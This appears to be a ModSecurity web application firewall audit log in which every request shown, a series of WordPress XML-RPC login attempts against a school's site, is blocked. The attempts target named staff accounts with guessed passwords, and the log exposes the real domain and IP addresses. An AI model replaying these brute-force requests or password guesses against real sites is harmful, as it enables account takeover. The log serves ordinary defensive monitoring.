X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--2c74e644-C--
wp.getUsersBlogs
wakahumas
wakahumas1986
--2c74e644-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2c74e644-E--
--2c74e644-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776895481434 4182 (- - -)
Stopwatch2: 1744776895481434 4182; combined=3224, p1=355, p2=2665, p3=0, p4=0, p5=121, sr=79, sw=83, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2c74e644-Z--
--4192fa78-A--
[16/Apr/2025:11:15:55 +0700] Z_8u-ype92T0H9-Aa0y48QAAAEA 103.236.140.4 56000 103.236.140.4 8181
--4192fa78-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4192fa78-C--
wp.getUsersBlogs
wakahumas
Admin@321
--4192fa78-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4192fa78-E--
--4192fa78-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744776955021808 4318 (- - -)
Stopwatch2: 1744776955021808 4318; combined=3305, p1=363, p2=2774, p3=0, p4=0, p5=98, sr=82, sw=70, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4192fa78-Z--
--fabe2510-A--
[16/Apr/2025:11:16:55 +0700] Z_8vN0-sESiKFppgz04ZiQAAAMU 103.236.140.4 56304 103.236.140.4 8181
--fabe2510-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fabe2510-C--
wp.getUsersBlogs
wakahumas
2010
--fabe2510-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fabe2510-E--
--fabe2510-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (149+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777015375108 4121 (- - -)
Stopwatch2: 1744777015375108 4121; combined=3178, p1=354, p2=2659, p3=0, p4=0, p5=97, sr=89, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fabe2510-Z--
--fdc08b77-A--
[16/Apr/2025:11:17:55 +0700] Z_8vc5VnVduWmh0dMDMUCwAAAII 103.236.140.4 56632 103.236.140.4 8181
--fdc08b77-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fdc08b77-C--
wp.getUsersBlogs
wakahumas
qqqqq
--fdc08b77-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fdc08b77-E--
--fdc08b77-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777075088697 4197 (- - -)
Stopwatch2: 1744777075088697 4197; combined=3219, p1=344, p2=2713, p3=0, p4=0, p5=94, sr=81, sw=68, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fdc08b77-Z--
--d1fc2e39-A--
[16/Apr/2025:11:18:15 +0700] Z_8vhxk9XPLR9cFiTEu-jgAAABI 103.236.140.4 56732 103.236.140.4 8181
--d1fc2e39-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d1fc2e39-C--
wp.getUsersBlogs
wakahumas
1234%^&*
--d1fc2e39-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d1fc2e39-E--
--d1fc2e39-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777095173467 4381 (- - -)
Stopwatch2: 1744777095173467 4381; combined=3330, p1=354, p2=2811, p3=0, p4=0, p5=98, sr=79, sw=67, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d1fc2e39-Z--
--af5fd814-A--
[16/Apr/2025:11:18:55 +0700] Z_8vrxk9XPLR9cFiTEu-6wAAAAk 103.236.140.4 56938 103.236.140.4 8181
--af5fd814-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--af5fd814-C--
wp.getUsersBlogs
wakahumas
superman
--af5fd814-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af5fd814-E--
--af5fd814-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777135271789 3988 (- - -)
Stopwatch2: 1744777135271789 3988; combined=3036, p1=351, p2=2519, p3=0, p4=0, p5=95, sr=80, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af5fd814-Z--
--cd6c6951-A--
[16/Apr/2025:11:19:55 +0700] Z_8v6ype92T0H9-Aa0y5kwAAAFM 103.236.140.4 57254 103.236.140.4 8181
--cd6c6951-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--cd6c6951-C--
wp.getUsersBlogs
wakahumas
99999999
--cd6c6951-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cd6c6951-E--
--cd6c6951-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777195220946 4236 (- - -)
Stopwatch2: 1744777195220946 4236; combined=3276, p1=372, p2=2738, p3=0, p4=0, p5=97, sr=81, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cd6c6951-Z--
--23c42a33-A--
[16/Apr/2025:11:20:55 +0700] Z_8wJype92T0H9-Aa0y5tAAAAEU 103.236.140.4 57562 103.236.140.4 8181
--23c42a33-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--23c42a33-C--
wp.getUsersBlogs
wakahumas
1234567891
--23c42a33-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--23c42a33-E--
--23c42a33-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (153+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777255228205 4419 (- - -)
Stopwatch2: 1744777255228205 4419; combined=3503, p1=384, p2=2837, p3=0, p4=0, p5=155, sr=82, sw=127, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--23c42a33-Z--
--93d99553-A--
[16/Apr/2025:11:21:55 +0700] Z_8wYxk9XPLR9cFiTEu_1AAAAAc 103.236.140.4 57902 103.236.140.4 8181
--93d99553-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 230
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--93d99553-C--
wp.getUsersBlogs
wakasarpras
Marketing2011
--93d99553-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--93d99553-E--
--93d99553-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777315265269 4225 (- - -)
Stopwatch2: 1744777315265269 4225; combined=3245, p1=352, p2=2724, p3=0, p4=0, p5=98, sr=82, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--93d99553-Z--
--d36b4751-A--
[16/Apr/2025:11:22:55 +0700] Z_8wnxk9XPLR9cFiTEvAKgAAABQ 103.236.140.4 58224 103.236.140.4 8181
--d36b4751-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--d36b4751-C--
wp.getUsersBlogs
wakasarpras
Admin!@#
--d36b4751-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d36b4751-E--
--d36b4751-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777375350298 4303 (- - -)
Stopwatch2: 1744777375350298 4303; combined=3262, p1=359, p2=2724, p3=0, p4=0, p5=110, sr=82, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d36b4751-Z--
--9403941e-A--
[16/Apr/2025:11:23:55 +0700] Z_8w2xk9XPLR9cFiTEvAjgAAABY 103.236.140.4 58538 103.236.140.4 8181
--9403941e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--9403941e-C--
wp.getUsersBlogs
wakasarpras
customer
--9403941e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9403941e-E--
--9403941e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777435263704 4618 (- - -)
Stopwatch2: 1744777435263704 4618; combined=3509, p1=348, p2=2905, p3=0, p4=0, p5=147, sr=79, sw=109, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9403941e-Z--
--37e14a01-A--
[16/Apr/2025:11:24:51 +0700] Z_8xEype92T0H9-Aa0y6NQAAAEw 103.236.140.4 58810 103.236.140.4 8181
--37e14a01-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 225
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--37e14a01-C--
wp.getUsersBlogs
wakasarpras
1234%^&*
--37e14a01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--37e14a01-E--
--37e14a01-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777491639233 5501 (- - -)
Stopwatch2: 1744777491639233 5501; combined=3854, p1=455, p2=3219, p3=0, p4=0, p5=109, sr=90, sw=71, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--37e14a01-Z--
--c3e36413-A--
[16/Apr/2025:11:24:55 +0700] Z_8xF5VnVduWmh0dMDMUaAAAAJg 103.236.140.4 58884 103.236.140.4 8181
--c3e36413-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--c3e36413-C--
wp.getUsersBlogs
wakasarpras
qazxsw
--c3e36413-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--c3e36413-E--
--c3e36413-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (145+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777495134879 4925 (- - -)
Stopwatch2: 1744777495134879 4925; combined=3459, p1=326, p2=2947, p3=0, p4=0, p5=108, sr=68, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--c3e36413-Z--
--adfbd541-A--
[16/Apr/2025:11:25:55 +0700] Z_8xUxk9XPLR9cFiTEvB8QAAAAA 103.236.140.4 60858 103.236.140.4 8181
--adfbd541-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--adfbd541-C--
wp.getUsersBlogs
wakasarpras
junior
--adfbd541-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--adfbd541-E--
--adfbd541-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777555097125 5317 (- - -)
Stopwatch2: 1744777555097125 5317; combined=3858, p1=506, p2=3117, p3=0, p4=0, p5=138, sr=89, sw=97, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--adfbd541-Z--
--e181c733-A--
[16/Apr/2025:11:26:55 +0700] Z_8xj5VnVduWmh0dMDMVUQAAAIQ 103.236.140.4 34552 103.236.140.4 8181
--e181c733-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--e181c733-C--
wp.getUsersBlogs
wakasarpras
tottenham
--e181c733-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--e181c733-E--
--e181c733-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1744777615097271 5299 (- - -)
Stopwatch2: 1744777615097271 5299; combined=3786, p1=470, p2=3106, p3=0, p4=0, p5=121, sr=89, sw=89, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--e181c733-Z--
--514e7a0e-A--
[16/Apr/2025:11:27:55 +0700] Z_8xyxk9XPLR9cFiTEvC6QAAAAI 103.236.140.4 36138 103.236.140.4 8181
--514e7a0e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 14.18.90.195
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 14.18.90.195
X-Forwarded-Proto: http
Connection: close
Content-Length: 228
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--514e7a0e-C--
wp.getUsersBlogs
kasubagtu
kasubagtu2000
--514e7a0e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--514e7a0e-E--
--514e7a0e-H--
